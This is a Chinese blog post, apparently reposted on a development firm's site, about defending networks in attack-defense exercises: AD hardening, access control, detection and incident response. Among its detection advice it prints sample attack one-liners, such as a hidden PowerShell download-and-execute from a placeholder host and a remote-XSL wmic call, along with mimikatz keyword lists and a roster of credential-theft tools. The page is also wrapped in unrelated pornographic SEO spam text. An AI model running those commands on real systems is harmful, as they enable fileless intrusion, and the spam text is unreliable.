亚洲欧洲久久av_极品美女国产精品免费一区_老司机网站免费_免费视频入口_人妻网站成熟人妻VA网站_福利视频网站

復檢滲透測試網站安全攻守項目分析
  • 更新時間:2025-04-19 23:49:02
  • 開發經驗
  • 發布時間:3年前
  • 653

最近我們Sinesafe參加的幾家機構的滲透測試防守方防護方案評估復查,部分防守方缺乏對攻擊者的正確認知,攻擊者的手法已經比較高超了,不掃描,不落地,污染日志等都很普及了。同時也要正確認知對手:攻防演練中,攻擊者并非無所不能,他們面臨著和防御方一樣的問題:時間緊,任務重。所以攻擊者的攻擊目標,攻擊手法也是有跡可循的,知己知彼才能百戰百勝。


滲透測試

一、知彼

攻擊者也是講成本的,因此防守方最好的策略是:做的比其他防守方好一點點即可。好一點的含義:不在低級問題上犯錯(弱密碼、互聯網應用遠程RCE、管理后臺暴露、重要服務器未打補丁等)。對于“時間緊、任務重”的防守方來說,修建固若金湯的防線顯然意味著大成本投入,以及最緊缺的時間,因此本文不會面面俱到,只選擇性價比高值得快速投入的安全措施和大家分享。


攻擊者一般:目標明確、步驟清晰、控制成本、反檢測,反清理、三流分立。

目標明確:攻擊者只攻擊得分項,和必要路徑(外網入口,內網立足點),對這些目標采取高等級手段,會隱蔽操作;對非必要路徑順路控制下來的服務器,并不怕被發現,用起來比較隨意,甚至主動制造噪音,干擾防守方。


步驟清晰:信息收集-控制入口-橫向移動-維持權限-攻擊目標系統。每一步都是經典操作和教科書式手法。


控制成本:

優先攻擊高權限賬號,如管理員,目標系統負責人賬號;

優先攻擊運維/安全人員賬號和終端,這些人往往有服務器root賬號,安全設備管理員賬號,可以進一步深入控制;

優先攻擊集中管控設施,如域控,集中身份認證系統,終端管理系統,攻陷單系統即獲得公司內大部分系統的權限;

優先攻擊基礎設施,如DNS,DHCP,郵件系統,知識分享平臺,oa系統,工單系統;這些系統有內置高權限賬號,或可以幫助攻擊者隱蔽痕跡。或Git/SVN等開發源代碼管理服務器,通過代碼審計發現應用0day漏洞。


反檢測,反清理:

樣本隱蔽技術(白利用(帶微軟簽名的程序執行未簽名的黑dll),樣本不落地執行(從網上加載樣本,只運行在內存,不落盤不驚動殺軟));


快速擴散(攻擊者會將攻擊包做成自動化工具,降低人力投入,快速控制一批有漏洞發服務器);


停止日志外發,日志清除(腳本優先停止常見日志外發工具;同時有開源自動化工具來劫持日志產生的進程,使得系統不產生日志;使用完后刪除access.log等日志);

減少掃描,通過分析日志、分析配置文件、管理員來源IP等方式來獲取內網的其他機器IP信息,而不是掃描。


點擊添加圖片描述(最多60個字)

三流分立:

掃描流:用來大批量掃描內網存活IP和漏洞,掃描源通常不被攻擊者重視,被清除也不會影響到攻擊計劃,高水平攻擊者通常使用掃描行為來分散防守方精力。


數據流:用來向外網大量傳輸非關鍵數據,通常是有互聯網權限的終端或服務器(終端較多),很少有隧道行為或掃描行為,通過簡單的https,sftp方式傳輸數據

控制流:用于接受和傳遞遠控指令的服務器,攻擊者最重視的設施,使用起來最為謹慎,和遠控中心進行交流,常用組件cobaltstrike, empire;有隧道行為,且數據傳輸量很少,會連接若干個IP和域名(避免外網封禁),傳輸必定加密,不使用自簽名證書。


在本次攻防實戰演習準備階段,攻擊方準備了幾十個C2域名。


二、知己知己,主要是知曉防守方防守區域內的資產信息,縮小暴露面。原則如下:

不用的系統,該下的下,該暫停的暫停。不用的功能,該下的下,該暫停的暫停。(平時就應該這樣處理,而不是戰時)


該取消訪問的取消,能限制訪問范圍的限制訪問范圍。

在用的,搞清楚功能,雙流(數據流和運維流)誰用,有沒有風險,能否一鍵處置。縮小暴露面 1.按資產所屬緯度梳理互聯網資產、分支機構資產、子公司資產、外聯公司資產、公有云資產、開發商、外包商。


容易忽視的:

公有云資產,因為有的業務部門和分支機構公有云申請都不經過IT部門,上面卻放了大量業務數據。


開發商/外包商的資產。開發商/外包商一般給甲方外包開發信息系統,開發商/外包商公司內部也會自建Git/SVN等源代碼管理服務器,存有已經交付給甲方的信息系統源碼,而開發商/外包商的源碼系統管理安全能力和甲方相比可能就差幾個量級了。后果就是:通過獲得的源碼,發現系統應用0day,從而控制甲方已上線信息系統。


縮小暴露面 2.按資產屬性梳理

特別關注資產的安全屬性:中間件或框架(版本)、開放在公網API接口(特別是未下線的老接口)、管理后臺開放在公網、高危功能(文件上傳點、短信驗證碼、重置密碼、文件下載)、遠程接入點(VPN)、特權賬戶(應用管理特權賬戶、應用連接賬戶、系統管理特權賬戶、可以修改賬戶權限的賬戶、備份賬戶、高管層賬戶)。

每一個安全屬性都是血的教訓。


縮小暴露面 3.忽視點

所有內部文檔服務器上(含OA、郵件系統、jira、wiki、知識庫等)敏感信息清理或限制訪問權限,不要有:網絡拓撲、安全防護方案和部署位置、各類密碼;

資產管理平臺上,蜜罐不要叫蜜罐、安全設備IP要隱藏;


各類口令:弱口令、默認口令、已泄露口令。


每一個忽視點都是眼淚的結晶。


安全資產管理,更多內容參加:安全資產管理中容易被忽視的幾點


三、防護關鍵點


臨戰前,再想按照大而全的梳理一遍,幾無可能,最好就是把防護關鍵點過一遍,切記都實際看一遍,不要相信別人的反饋。


3.1 安全隔離

滲透測試繞過

從實戰來看,網絡層的訪問控制被證明是最有效的(攻擊者很難繞過去),不要相信應用層控制。網絡層訪問控制屬于基礎架構安全,這是最有效最重要的,整個安全防護的基礎。

訪問控制策略原則:明細允許,默認拒絕。

從內網去互聯網的訪問控制

辦公終端:除個別協議無法限制目的IP外,其余協議全部限制。特殊訪問需求,快速開通。有條件的考慮:終端不能直接訪問互聯網,需要訪問互聯網的兩種解決方案:另外分配一臺上網終端、虛擬瀏覽器

辦公服務器:特殊訪問需求開通,默認拒絕

生產網:生產網終端禁止上互聯網、服務器特殊訪問需求開通,默認拒絕


2.互聯網訪問內網:對互聯網提供服務的服務器必須在DMZ,和內網隔離。


3.重要系統的訪問控制策略

基礎設施如AD、郵件系統的訪問控制。

別小看基礎設施ACL訪問控制,這是對抗應用和系統漏洞的最低成本和最有效措施。漏洞層出不窮,唯有ACL訪問控制藥效持久,強烈推薦。

終端安全管控、自動化運維系統等集中控制系統后臺登錄限制訪問來源。(優先使用網絡訪問控制、其次使用系統層限制、搭配使用應用層限制)


3.2 AD防護

準備階段

2.加固階段

對抗權限提升:對域賬號進行權限DACL梳理,加固高權限賬號

檢測高權限賬號可以用bloodhound黑客工具監測,也可以通過System Internal Tools的ADExplorer來進行檢測:

1)修改密碼(建議在演習前臨近時間進行修改)

2)調整權限和分組,根據賬號的歸屬人的權限進行調賬,取消非域管賬號的敏感權限。

3)修改分組內的不合適的人員賬號。

4)敏感賬號不允許委派。

5)敏感賬號不允許取消Kerberos預鑒權。

6)敏感賬號的密碼強度符合規定。

7)具備直接域管或者間接域管權限(例如可以修改Domain Admins的賬號就具備間接域管權限)的賬號的活動進行報備制度,演習期間未經允許不得進行任何操作,包括登錄等等。

8)辦公機和終端演習前全部重啟,消除敏感賬號憑據留存。

9)服務器登錄查看相關憑據,如果有刪除或通過注銷來刪除服務器上留存的憑據。

10)參照https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-f--securing-domain-admins-groups-in-active-directory配置域管理員權限。

對抗攻擊者使用MS14-068,MS17-010攻擊域:從舊到新依次安裝DC上的windows補丁。

對抗攻擊者使用ExchangeSSRF漏洞:從舊到新依次安裝Exchange上的windows補丁。

對抗LDAP relay攻擊:在域控上配置LDAP enforce signing。

對抗LDAP relay和SSRF攻擊:在域控上配置LDAPS channel binding。

對抗LLMNR/NBT Poisoning攻擊:關閉域內WPAD服務。



3.檢測階段

滲透測試檢測階段

原則:若域不安全,最佳修復方案是重裝。

檢測敏感共享目錄訪問:訪問了AD服務器的非正常共享目錄 (非SYSVOL文件夾)

檢測mimikatz一系列攻擊行為:

Mimikatz通過sysmon進程來進行檢測,常見關鍵字有“gentilkiwi (Benjamin DELPY)”(公司名稱)、

其他關鍵字:kerberos::golden sekurlsa::pth kerberos::ptt lsadump::dcshadow lsadump::dcsync sekurlsa::logonpasswords privilege::debug misc::skeleton

檢測Kerberos弱加密方式:非AES加密方式的Kerberos票據加密請求相當可疑

檢測異常注冊表變更和dump:DSRMAdminLogonBehavior

變更AdminSDHolder

導出HKLM\SAM內容

導出HKLM\SYSTEM內容

導出HKLM\SECURITY內容

檢測ntdsutil濫用:使用了ntdsutil的敏感參數activate instance ntds ;使用了ntdsutil的敏感參數set dsrm password

檢測SID history變更:賬號加入SID History成功、失敗

檢測lazagne密碼提取工具:特征 lazagne

攻擊者喜歡用的其他工具:

procdump、PsExec、cain、Mshta、cmstp、QuarkPwDump、getpass、gethash、ntdsdump、Get-PassHashes、Wce、psaattack。

3.3 主機防護(終端和服務器)對抗攻擊者在嘗試控制終端和服務器時,為了繞過常規的殺毒軟件,通常會使用一些免殺手段。而某些免殺手段(如白利用,樣本不落地執行)由于非常穩定和高效,更是受到廣大攻擊者的青睞。


1.Powershell IEX組建下載執行.(文件在內存執行,不落硬盤)

利用代碼示例:powershell.exe -nop -whidden -c IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:81/aa'))">

監測特征:"IEX” AND “(New-Object Net.WebClient).DownloadString“

2.Windows系統白文件利用(wmic.exe

利用代碼示例:cmd/c wmic os get /format:”\\x.x.x.x\1.xsl”&start/wait notepad

監測特征:"wmic os get" AND "/format"3.Windows系統白文件利用(csc.exe)

利用代碼示例:

"C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe"/noconfig /fullpaths@"C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline"

監測特征:"csc.exe" AND ("/r:System.EnterpriseServices.dll"OR "/unsafe")4.Windows系統白文件利用(msiexec.exe)

特征:被動執行后臺執行的參數,有一定誤報率。請自行研究,不再舉例。

5.檢測certutil白利用

特征:常見繞防火墻使用的參數。請自行研究,不再舉例。

6.檢測通過url.dll來進行不落地執行

請自行研究,不再舉例。


3.4 賬戶和權限對抗

高權限一律清理,限制使用范圍,每次使用后確認。

應用權限通過日志分析檢測濫用。

關注備份賬戶、可修改權限賬戶的使用。

終端24小時重啟一次。(對抗終端權限抓取類攻擊)


3.5 瞬間死亡

瞬間死亡有兩種方式:路徑打穿、系統打穿。


3.5.1 路徑打穿

直接從未想過(未設防)的路徑攻擊過來。郵件是控制終端第一選擇入口,具體防護可參見《企業安全建設指南:金融行業安全架構與技術時間》第16章:郵件安全。

邊緣網包括無線和自助終端,包括:打卡機、自動售賣機、會議室設備、ATM機、排隊機等。限制無線和自助終端網絡和內網訪問。

限制分支機構、外聯公司等網絡和總部的網絡訪問。

不要相信理論上不能全通,但實際上存在全通內網的系統。(死于方便性)


3.5.2 系統打穿

系統打穿,都是血淚史。因為我們總是忘記了這些最大的風險源。優先攻擊中心化的系統和跨兩網的系統,包括終端安全管控控制臺(控制臺安全防護能力很弱)、運維管理系統/Zabbix/Nagios/堡壘機等、單點登錄SSO系統、AD活動目錄;

優先攻擊基礎設施:DNS、DHCP、郵件系統、研發服務器SVN/Git;


高價值終端:


網絡管理員:終端內有網絡拓撲和ACL控制策略,甚至可以修改訪問控制;

安全管理員:有安全防護方案和檢測系統、告警系統登錄權限,很多安全系統做了登錄來源限制,繞過手段之一就是控制安全管理員的終端,同時抓取安全管理員賬戶密碼,攻擊者一舉兩得;


研發個人終端/運維個人終端:高價值數據;


內網掃描器:網絡權限較大,哪都能去。


代碼服務器:代碼數據價值比較高。私有協議開發的應用程序,源碼要保護好,有經驗攻擊團隊帶代碼審計技能成員,通過源碼審計發現應用0day

3.6 容易出問題的點

互聯網應用框架RCE

應用和中間件管理后臺暴露

VPN:未啟用雙因素,或存在未啟用雙因素的部分用戶

測試環境的測試系統未及時打補丁、弱密碼

通過郵件入口控制辦公終端

跨兩網的設備

服務器密碼同質問題


社工

四、事中和事后

前面分享了很多防護和檢測的事項,但防守方到了這個階段,更重要的是考慮一下事中的各種過載信息的研判和快速應急處置措施。我們打內部攻防演習的時候,最大的困擾是決策和處置。


4.1 過載信息研判

有效高速的決策機制,什么權限范圍內的由什么人決策,這是授權。


什么崗位(人)負責什么,這是職責劃分。比如誰負責跟蹤每條告警信息到Closed狀態?誰負責斷網?誰負責樣本分析?誰負責失陷主機排查?誰負責溯源路徑?誰負責記錄?誰負責匯報?等等。


4.2 快速應急處置

4.2.1 硬件和后勤

大的作戰室,容納全部防守隊伍;

好的白板(最好電子的),便于梳理攻擊路徑;

準備好零食和一日三餐、行軍床。

4.2.2 重要信息同步

已經淪陷的IP清單(黑名單),同步給所有防守方;

是否C2域名快速判斷,注意真假難辨的域名。


4.2.3 各類應急處置措施

斷網:快速斷網的操作規范和自動化工具

誘餌

臨時添加ACL和FW規則

下線業務:和業務方建立暢通的溝通機制和快速的決策機制

如果失陷(疑似)主機,決策用于誘餌,務必確保誘餌的風險可控,萬一持續利用誘餌在內網橫向移動,再進行限制就困難了。

注意體力分配,高水平攻擊者通常使用掃描行為等方式來分散防守方精力。

4.3 滲透測試復檢

攻防實戰演習后的總結改進提升,才是最終目的。

4.3.1 防護薄弱點和改進措施

安全團隊

協作團隊

廠商和第三方

安全團隊不好推動的工作,不好講的話,要不到的資源,都可以在這里提出來。

應急處置薄弱點和改進措施,落實到人、計劃和資源中,才是務實的。


4.3.3 資源不足,要資源

安全運營是必由之路,參見 金融業企業安全建設之路

7*24小時的安全運營,既然攻擊對手是7*24小時的,為什么安全運營不是呢?

4.3.4 必要的管理層匯報


五、注意事項

不要影響業務。攻防演習前的加固,需要妥善評估對業務可用性影響,攻防演習中的應急處置,需要妥善評估對業務可用性影響,畢竟,業務可用性才是老大,安全不是,擺正心態和位置,如果對滲透測試有想法的朋友可以找專業的網站安全公司來處理解決,國內推薦Sinesafe,綠盟,啟明星辰,等等的網站安全公司。

我們專注高端建站,小程序開發、軟件系統定制開發、BUG修復、物聯網開發、各類API接口對接開發等。十余年開發經驗,每一個項目承諾做到滿意為止,多一次對比,一定讓您多一份收獲!

本文章出于推來客官網,轉載請表明原文地址:https://www.tlkjt.com/experience/7603.html
推薦文章

在線客服

掃碼聯系客服

3985758

回到頂部

主站蜘蛛池模板: 新91av_女人被做到高潮视频_韩国精品一区二区三区无码视频_亚洲国产亚洲_天天综合亚洲色在线精品_成人在线播放网站_午夜成年_黄色a在线 | 98超碰在线_日本A级作爱片金瓶双艳_国产精品亚洲一区二区三区喷水_青青草成人自拍_在线观看不卡av_JAPANESE日本熟妇喷水_91伊人_欧美一码二码三码无码 | 国产精品久久久久久久毛片_一级黄色片久久_青青草华人在线_精品人伦一区_久久久久久逼_被夫の上司に犯中文字幕_www.国产一区二区三区_欧美亚洲激情 | 国产特级黄色片_欧美自拍小视频_奇色影视_三及片日本_日韩福利_最新中文字幕在线资源_中文字字幕在线中文乱码范文_YY111111少妇影院免费观看 国产精品亚洲综合天堂夜夜_欧美成人小视频_国产人妻精品久久久久野外_日日噜噜噜夜夜爽爽狠狠小说_忘忧草www日本高清_日韩区av_日本在线视频免费观看_真实的国产乱ⅩXXX66V | 3344成人免费高清免费视频_国产乱码精品一区二区三区忘忧草_91精品国产色综合久久不卡蜜臀_黄色免费观看视频网站_无尺码精品日本欧美_日韩AV一中美AV一中文字慕_国产日本亚洲_人妻系列无码专区久久五月天 | 久久中文一区二区_久视频精品线在线观看_97久久人人爽人人爽人人片_日韩中出视频_视屏一区_热99re久久国免费超精品首页_日韩无线码精品中文字幕视频手机_美女毛片免费看 | 天天摸夜夜摸爽爽狠狠婷婷97_欧美一区_伊人插插插_日本护士体内SHE精2╳╳╳_日韩免费不卡视频_国产成人午夜精品福利视频_欧美不卡中文字幕一区二区_四虎4hu永久免费 | 亚洲成人av一区二区三区_中文字幕在线中文字幕二区_欧美巨大XXXX做受中文字幕_超碰在线久_av永久免费观看_欧美成人精品高清在线观看_一个人免费在线观看动漫视频www_永久不封国产av毛片 | 免费动漫黄爽A片在线观看_一区精品视频_91在线无精精品秘?入口九色_av网站免费播放_亚洲综合无码精品一区二区三区_国产精品嫩草99a_av免费看国产_日韩αv在线 | 成人在线观看不卡_国产人成视频在线视频_91亚洲精品久久久中文字幕_九九九九九九精品_超碰人人插_麻豆文化传媒在国产之光_国产精品久久综合_成年人网站国产 | 日本精品在线免费观看_久久综合射_久久久橹橹橹久久久久高清_青青操五月天_多人伦精品一区二区三区视频_久久精品中文无码资源站_99久久这里有精品_秋霞理论福利院 | 第84页国产精品_日本天堂视频在线观看_欧美在线三级_欧产日产国产精品视频_日韩精品无码免费专区午夜_国产超精品无码不卡AV_中文字幕无码肉感爆乳在线_成人v片 | 欧美黄视频网站_亚洲三级黄色片_亚洲精品一区二区网址_在线sese_无码福利日韩神码福利片_在线亚洲无砖砖区免费_在线一区二区三区精品_青草青青在线视频 | 91网在线看_国产放荡AV剧情演绎麻豆_日本一道本高清_亚洲国产AV一区二区三区四区_成版人性视频_亚洲曰本AV在线天堂_成人免费精品_羞羞答答成人影院www | 久久男人AV资源网站_极品久久久久久_国产精品国产三级国产有见不卡_中文字幕+乱码+中文乱_国产精品第8页_国产精品久久久久久在线_久草网站_国产成人8x视频网站入口 | 青苹果乐园免费高清资源_日本美女中文字幕_91大神在线影院_久久婷婷六月_一级高清_无码人妻精品中文字幕_久久精品青青大伊人av_精品日韩卡1二2卡3卡4卡乱码 | 一级毛片一级毛片一级毛片aa一_国av在线_日韩美女乱淫作爱欣赏_日本a∨视频_久久久久久久久91_久久众筹精品私拍模特_97久久精品_午夜1234 | 7777日本精品一区二区三区_在线精品国产欧美_人妻无码αv中文字幕久久_精品999www_午夜精品区_视频免费一区_蜜桃成人免费视频在线播放_黑人巨大两根一起挤进交换 | 99热九九这里只有精品10_色吧一区_99久久国产综合精品女图图等你_国产AV永久无码精品网站_精品久久人人做人人爱_亚洲熟妇另类久久久久久_精品国精品国产自在久不卡_天天躁日日躁狠狠躁日日躁 | 亚洲丁香婷婷久久一区二区_国语第一次处破女ccCAB_免费午夜爽爽爽www视频十八禁_国产又爽又黄又舒服又刺激视频_午夜精品影视_久久av麻豆_看日本黄色片_精品欧美国产 | 大胆欧美熟妇xxbbwwbw_国产精品欧美久久久_60—70sexvideos老少配_色精品一区二区三区_懂色av一区二区三区观看_成人sese_国产一区二区三区乱码_亚洲免费综合 | 青青成线在人线免费啪_精品亚洲国产成人_中文精品久久久久鬼色_欧洲黄色录像_国产精品一区二区免费久久精品_狠狠色丁香婷婷综合久久来来去_精品自拍亚洲一区在线_国内a级毛片免费观看品善网 | 久久久国产三级_japanese乱人伦精品_欧美一区黄色_四虎影视在线看免费观看_a三级毛片_国内视频一区二区三区_www在线看片_A级毛片毛片免费观看丝瓜 | 中文字幕无码日韩专区_久久艹逼_男人j进女人p免费视频_日本黄色免费在线_天堂综合网久久_亚洲欧美国产精品久久久久_中文字幕日韩高清2024_亚洲欧美激情精品一区二区 | 久久久久久久久无码精品亚洲日韩_伊人狠狠色_伊人久久一区二区三区无码_狠狠躁天天躁夜夜添人人_在线www免费观看视频_第一区在线_天天搞夜夜_91久久99久久91熟女精品 | 欧美成人毛片_日本精品免费_很黄很爽的视频网站_91午夜免费视频_5060午夜一级_日本3级片_日本a级影片_日本中文字幕精品 | 亚洲hairy多毛pics大全_日韩欧美一区二区三区在线_插下面视频_偷拍视频网站_成年人视频在线免费观看_精品无码一区二区三区水蜜桃_国产精品手机免费_亚洲无线一二三四区手机 | 毛片免费视频在线观看_69久久久久久_少妇CHINA中国人妻VIDEO_国产精品国产自产拍高清_在公车上拨开内裤进入毛片_瑟瑟综合网_成人影院在线视频_国产精华最好的产品入口 | 国产成人精品视频在线_av网站亚洲_成人一区二_国产精品自产拍在线观看_亚洲av日韩av激情亚洲_91在线免费公开视频_国产精品二区在线观看_看黄A大片爽爽影院免费无码 | 四虎黄色影视_不卡在线观看亚洲视频_在线a网_国产日韩在线观看视频_国产日韩欧美亚洲_色的综合_97夜夜澡人人爽人人_久久久6精品成人午夜51777 | 大青草久久久蜜臀av久久_国产日韩乱码精品一区二区_亚洲国产一成久久精品_免费看日本黄色片_国产精品久久夂夂精品香蕉爆_99久久自偷自偷国产精品不卡_av网址免费在线观看_一个人免费看的WWW在线观看 | 国产精品免费视频xxxx_日本精品一区二区三区四区的功能_国产午夜视频免费_欧美不卡在线视频_日日嗨av一区二区三区四区_国产高清乱伦自拍_无码男男肉片在线观看_国产午夜毛片 | 午夜高清福利_亚洲精品欧洲_就爱干av_国产片在线免费观看_视频黄色免费_好男人社区WWW在线观看_日日噜噜夜夜狠狠视频_亚洲中文成人中文字幕 | 亚洲蜜芽在线精品一区_国产日韩欧美一区二区_狠狠躁夜夜躁av蜜臀少妇_黄色一级片免费在线观看_亚洲精品在线观看视频_亚洲毛片在线视频_国产精品久人妻精品老妇_日本在线视频免费 | 女人被躁到高潮免费视频_一区二区视频免费看_色噜噜狠狠色综合成人网_欧美成a人片在线观看久_国产日韩精品中文字无码_一级特级片_国产精品av久久久久久久久久_天堂8中文在线最新版在线 | 亚洲免费天堂_欧美一级淫片免费午夜视频_国产精品色在线_日日夜夜香蕉_九九福利视频_2022精品久久久久久中文字幕_欧美在线爱_国产精品视频麻豆 | 国产精品原创巨作av_馬与人黃色毛片一部_91成人品_国产一极内射視颍一_一级国产_日日日日干干干干_啪视频网站_裸体久久女人亚洲精品 | 水蜜桃AV无码_看黄网站在线看_国产黄在线看_国产日产免费高清欧美一区_青青草综合视频_免费久久久久_精品91久久久_久久国产精品无码网站 | www.久久草.com_国产91在线高潮白浆在线观看_成人无码精品一区二区三区_久久高清亚洲_色婷婷狠狠18禁久久yyy☆_亚洲春色Aⅴ无码专区在线播放_av在线网站免费观看_少妇大叫太大太粗太爽了A片 | 大青草久久久蜜臀av久久_国产日韩乱码精品一区二区_亚洲国产一成久久精品_免费看日本黄色片_国产精品久久夂夂精品香蕉爆_99久久自偷自偷国产精品不卡_av网址免费在线观看_一个人免费看的WWW在线观看 | 中文字幕人妻在线中字_性色av一区二区三区四区_亚洲永久入口_国内精品二区_日韩毛片网站_最近2019年日本中文免费字幕_亚洲AV无码一区二区三区DV_成人播放视频 |